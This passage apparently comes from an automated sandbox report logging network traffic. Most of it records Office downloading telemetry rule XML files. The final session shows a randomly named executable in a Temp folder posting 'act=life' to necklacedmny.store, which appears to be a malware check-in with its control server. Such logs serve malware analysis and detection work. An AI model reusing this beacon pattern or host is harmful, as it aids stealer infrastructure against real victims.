                                                                                                                                                                                                                                              x-azure-ref: 20241102T061618Z-16dc884887b9h6dlhC1DFW8rmg00000001ng0000000005e2
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              124192.168.2.46384513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:18 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                              x-ms-request-id: d548d899-c01e-00ad-0809-2ca2b9000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061618Z-16dc884887bkpzdnhC1DFWbc3n00000001ng00000000d1p7
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              125192.168.2.46384613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:18 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                              x-ms-request-id: cce89326-d01e-0065-2b38-2bb77a000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061618Z-16ccfc49897jxxn9hC1DFWexyc00000001p000000000467k
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              126192.168.2.46384713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:18 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                              x-ms-request-id: 09d23618-001e-000b-0deb-2b15a7000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061618Z-16ccfc498979lfwnhC1DFW56w800000001t000000000ab0p
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              127192.168.2.46384913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:19 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1378
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                              x-ms-request-id: 1cb8ce88-301e-0033-7f09-2cfa9c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061619Z-16ccfc49897b872mhC1DFWqtb000000001mg00000000dt1n
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              128192.168.2.46385113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:19 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1407
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                              x-ms-request-id: 130c4350-101e-000b-3e0f-2c5e5c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061619Z-176bd8f9bc5nsp7rhC1DFWgzkc000000018g0000000010za
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              129192.168.2.46385013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:19 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1370
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                              x-ms-request-id: 4fba8623-501e-0064-4a33-2b1f54000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061619Z-16ccfc498972c2r2hC1DFWxq6800000001hg00000000n26h
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              130192.168.2.46385313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:19 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                              x-ms-request-id: ac318a39-301e-0000-294e-2ceecc000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061619Z-r159446fcd7dm7pfhC1DFWkcfc00000000wg000000007zgm
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              131192.168.2.46385213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:19 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                              x-ms-request-id: 5d175d43-b01e-0084-050f-2cd736000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061619Z-r159446fcd7rrql5hC1DFWp150000000019g000000005du1
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              132192.168.2.463854188.114.96.34431236C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Host: necklacedmny.store
                                                                                                                                                                                                                                              2024-11-02 06:16:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                              2024-11-02 06:16:20 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:20 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
